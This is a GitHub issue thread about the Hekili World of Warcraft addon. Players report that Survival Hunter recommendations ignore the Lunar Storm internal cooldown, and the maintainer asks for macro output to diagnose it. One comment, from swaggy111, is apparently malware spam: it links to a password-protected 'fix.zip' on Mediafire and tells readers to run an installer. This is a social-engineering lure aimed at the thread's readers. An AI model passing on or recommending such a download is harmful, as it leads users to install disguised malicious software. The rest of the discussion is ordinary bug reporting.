### ISSUE TITLE
[REC] Sv: Lunar Storm ICD not implemented

### ISSUE THREAD

**Issue by Dyspraxic** [Hekili/hekili#3553]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/labels/recommendation) for this issue and was not able to find one.
- [X] I edited the title of this issue (above) so that it describes the issue I am reporting.
- [X] I am reporting an issue with the default priority included with the specialization (imported or edited priorities are not supported).

### Describe the Issue

The Survival recommendations suggest we send Wildfire Bomb almost on CD, with no regard for the Lunar Storm ICD. As a result, we're unable to proc Lunar Storm on CD in quite a few instances, because we have no Bomb charges available. This is a fairly substantial DPS loss for all ST and AOE builds. 

The Snapshot shows the following situation: Lunar storm is coming off ICD in 4 seconds, Bomb is coming off CD in 1-2 seconds (we currently have 0 charges), Hekili suggests we use our Bomb, this leads to a 6-8 second wait while Lunar Storm is off CD, but we can't proc it.  

### How to Reproduce

1. Enter the game as Survival Hunter using the Sentinel ST Build (C8PAFBU0uAhOaNI6RqWjIx917NGYgtxox2AysFsNzMbzYmZYmxMDzMMzMmZMAAAAAAAAAAAAAAoZYMjZmZmZGzwYYmhxwMmBb) 
2. Follow the standard Hekili recommendations
3. eventually Lunar storm will be coming off ICD in 3-5 seconds and Hekili will suggest sending our last Wildfire Bomb, despite being unable to generate another Bomb in time to proc Lunar Storm.
4. This results in major downtime of Lunar Storm and a large DPS loss

### Snapshot (Link)

https://pastebin.com/uUww2gey

### Contact Information

noobrange

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BorpoTingis** [comment]
Also seeing this issue, resulting in ~10-15k dps loss in single target

**Comment by syrifgit** [comment]
I think this is the spellID for the actual 15 second counter? https://www.wowhead.com/spell=451805/lunar-storm?spellModifier=137017

It seems to be just not implemented yet

**Comment by Hekili** [comment]
I need someone to trigger Lunar Storm and then provide me the output of this macro:

```
/run print( "IPS", IsPlayerSpell(451805) )
/run print( "GPABSI", C_UnitAuras.GetPlayerAuraBySpellID( 451805 ) )
/run print( "GSC", C_Spell.GetSpellCooldown( 451805 ) )
```

**Comment by BorpoTingis** [comment]
![image](https://github.com/user-attachments/assets/e8c43f16-0e08-4642-b102-7adb1c42ad70)

**Comment by syrifgit** [comment]
FWIW, the WA tracker made by Thyminde uses this trigger

combatlog - spell event - aura applied to player - spellid 450978 

manual duration of 13.7 seconds (accounts for owl travel time)
